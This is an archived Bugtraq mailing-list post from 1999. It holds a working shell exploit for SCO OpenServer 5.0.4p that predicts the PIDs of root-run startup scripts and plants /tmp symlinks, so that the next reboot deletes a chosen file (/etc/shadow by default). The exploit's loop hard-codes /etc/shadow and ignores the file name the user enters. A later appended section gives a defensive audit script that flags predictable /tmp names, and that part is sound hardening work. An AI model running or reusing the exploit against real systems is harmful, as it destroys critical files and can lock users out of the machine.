Bugtraq mailing list archives
Little exploit for startup scripts (SCO 5.0.4p).
From: leshka () LESHKA CHUVASHIA SU (leshka)
Date: Sun, 7 Mar 1999 15:07:23 +0300
#!/bin/sh
#
#                ... The punishment for inobedience ...
#                          (Cycle # 2)
#
#  This simple script can help to erase any file
#  (SCO OpenServer Enterprise System v 5.0.4p).
#  Have fun !
#
#
#
#
#  Some of "/etc/rc2.d" startup scripts create and then delete temporary files
#  with easily predictable names in "/tmp" directory. Below there are a few
#  interesting fragments of those nice scripts:
#
#  S84rpcinit:
#  ...
#  /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
#  /bin/rm -f /tmp/rpc.err$$
#  ...
#  rm -rf /tmp/rpc$$
#
#  S95nis:
#  ...
#  /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
#  /bin/rm -f /tmp/nis.err$$
#  ...
#  rm -f /tmp/nis$$
#
#  S85tcp:
#  ...
#  /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
#  /bin/rm -f /tmp/ps.err$$
#  ...
#  /bin/rm -f /tmp/tps$$
#
#  S89nfs:
#  ...
#  /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
#  /bin/rm -f /tmp/nfs.err$$
#  ...
#  rm -f /tmp/nfs$$
#
#  Every time during the startup such shell scripts create files with names
#  that include a process number of the above shell script. My numerous tests
#  showed that the number is always the same with every reboot. Pretty good,
#  isn't it? One problem: how to determine the process number of such script?
#  It's so simple! Child processes of this script have PID's with values
#  slightly higher than the parent's PID. A little math and one gets it. Next
#  step is creating a few symbolic links to the victim file in the "/tmp"
#  directory. During the next startup the victim file will be destroyed.
#
#  P.S. Looking forward to getting published a complete SCO's list of names
#  of such perfect shell scripts.
#
#  999,99*2
#
#  ----------------------
#  ---------------------------------------------
#  ----------------- Dedicated to my beautiful lady ------------------
#  ---------------------------------------------
#  ----------------------
#
#  Leshka Zakharoff, 1999.
#  E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
if [ _$1 = "_" ]
then
{
  echo -n "File to delete [/etc/shadow]:"
  read victim_file
  if [ _$victim_file = "_" ]
  then
    victim_file="/etc/shadow"
  fi
}
else
  victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
do
  pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
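The weakness the post describes is a root-run script writing to a world-writable directory under a name derived only from its PID, which anyone can pre-create as a symlink. The script below is an added example written for this archive page, not code from leshka's post or from SCO: an audit helper that greps a directory of init scripts for `/tmp/...$$` names, run here against two constructed sample scripts (one reproduces the S85tcp fragment quoted above; the other shows the safer pattern of `mktemp` in a directory that is not world-writable). It assumes a POSIX sh with `grep -n` and a `mktemp -d` that behaves as on GNU or BSD systems; the file names and the `/var/run` path in the safe sample are illustrative choices, not SCO's.

```shell
#!/bin/sh
# Added example (not from the original post): find predictable PID-based
# temporary file names in startup scripts, the pattern exploited above.

# find_predictable_tmp DIR
#   Prints "file:line:text" for each line in DIR/* that names a /tmp path
#   ending in "$$" (a name anyone can predict once the PID is known).
find_predictable_tmp() {
    grep -n '/tmp/[A-Za-z0-9_.-]*\$\$' "$1"/* 2>/dev/null
}

# count_predictable_tmp DIR
#   Number of offending lines, as a bare integer (handy for a return value).
count_predictable_tmp() {
    find_predictable_tmp "$1" | wc -l | tr -d ' '
}

# make_samples
#   Writes two constructed sample scripts into a scratch directory and
#   prints that directory's path.  S85tcp mirrors the fragment quoted in the
#   post; S99safe shows the alternative: a name chosen by mktemp inside a
#   directory that ordinary users cannot write to (assumed /var/run here).
make_samples() {
    d=$(mktemp -d)
    cat > "$d/S85tcp" <<'EOF'
#!/bin/sh
/bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
/bin/rm -f /tmp/ps.err$$
/bin/rm -f /tmp/tps$$
EOF
    cat > "$d/S99safe" <<'EOF'
#!/bin/sh
tmp=$(mktemp /var/run/ps.XXXXXX) || exit 1
/bin/ps -ef > "$tmp"
rm -f "$tmp"
EOF
    echo "$d"
}

# Scan the directory given as $1 (e.g. /etc/rc2.d), or the constructed
# samples when run with no argument.
if [ $# -gt 0 ]; then
    find_predictable_tmp "$1" || echo "no predictable /tmp names found in $1"
else
    sample_dir=$(make_samples)
    echo "Scanning constructed samples in $sample_dir"
    find_predictable_tmp "$sample_dir" || echo "(none)"
    rm -rf "$sample_dir"
fi
```

Against the samples the scan reports the three lines of S85tcp and nothing from S99safe. The grep is deliberately narrow (only `/tmp/name$$`); a real audit of an old System V box would also want to flag any fixed `/tmp/name` written by root, since a constant name is even easier to pre-create than a PID-derived one.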